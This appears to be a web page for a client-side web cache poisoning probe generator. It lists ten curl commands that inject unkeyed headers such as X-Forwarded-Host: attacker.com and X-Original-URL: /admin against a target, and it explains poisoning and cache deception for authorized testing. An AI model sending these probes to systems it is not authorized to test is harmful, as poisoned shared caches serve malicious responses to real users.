Configure the target and attack parameters to generate payloads.
Full URL including path
Key Unkeyed Headers
X-Forwarded-HostX-Original-URLX-Forwarded-SchemeX-HostX-Forwarded-Server# ─── Unkeyed Header Probes ───────────────────────────────────────────────
# These headers are commonly excluded from the cache key.
# If the backend reflects their value, the poisoned response may be cached.
# 1. X-Forwarded-Host (most common)
curl -s -o /dev/null -D - \
-H "X-Forwarded-Host: attacker.com" \
"https://target.com/page"
# 2. X-Original-URL
curl -s -o /dev/null -D - \
-H "X-Original-URL: /admin" \
"https://target.com/page"
# 3. X-Rewrite-URL
curl -s -o /dev/null -D - \
-H "X-Rewrite-URL: /admin" \
"https://target.com/page"
# 4. X-Forwarded-Scheme + X-Forwarded-Host (combined)
curl -s -o /dev/null -D - \
-H "X-Forwarded-Scheme: nothttps" \
-H "X-Forwarded-Host: attacker.com" \
"https://target.com/page"
# 5. X-Host header
curl -s -o /dev/null -D - \
-H "X-Host: attacker.com" \
"https://target.com/page"
# 6. X-Forwarded-Server
curl -s -o /dev/null -D - \
-H "X-Forwarded-Server: attacker.com" \
"https://target.com/page"
# 7. X-HTTP-Method-Override
curl -s -o /dev/null -D - \
-H "X-HTTP-Method-Override: GET" \
"https://target.com/page"
# 8. Fat GET (body in GET request)
curl -s -o /dev/null -D - \
-X GET -d "param=INJECTED_VALUE" \
"https://target.com/page"
# 9. X-Forwarded-Port
curl -s -o /dev/null -D - \
-H "X-Forwarded-Port: 443" \
"https://target.com/page"
# 10. True-Client-IP
curl -s -o /dev/null -D - \
-H "True-Client-IP: 127.0.0.1" \
"https://target.com/page"Web cache poisoning is an attack where you craft a request whose harmful response gets stored by a cache and served to every later visitor. It abuses unkeyed inputs, parts of the request the cache ignores when building its key but the application still reflects, so one malicious request can deliver stored XSS, a redirect, or a denial of service to many users.
The Cache Poisoning generator produces probe requests using headers commonly left unkeyed: X-Forwarded-Host, X-Forwarded-Scheme, X-Host, X-Original-URL, and Forwarded. Send a request with a marker value, confirm it reflects in the response, then verify a second clean request returns the poisoned response, which proves the cache stored your injected value.
In cache poisoning you control an unkeyed input to store a malicious response served to others. In web cache deception you trick the cache into storing a victim's private, authenticated response, for example by appending a static-looking suffix like /account/profile.css so the cache treats sensitive content as a cacheable asset that you can then retrieve.
Yes, the Web Cache Poisoning generator is free and runs entirely client-side, so the hosts and headers you enter are never sent to any server. The payloads are meant for authorized testing only, such as bug bounty targets in scope or your own infrastructure, since poisoning a shared cache affects real users.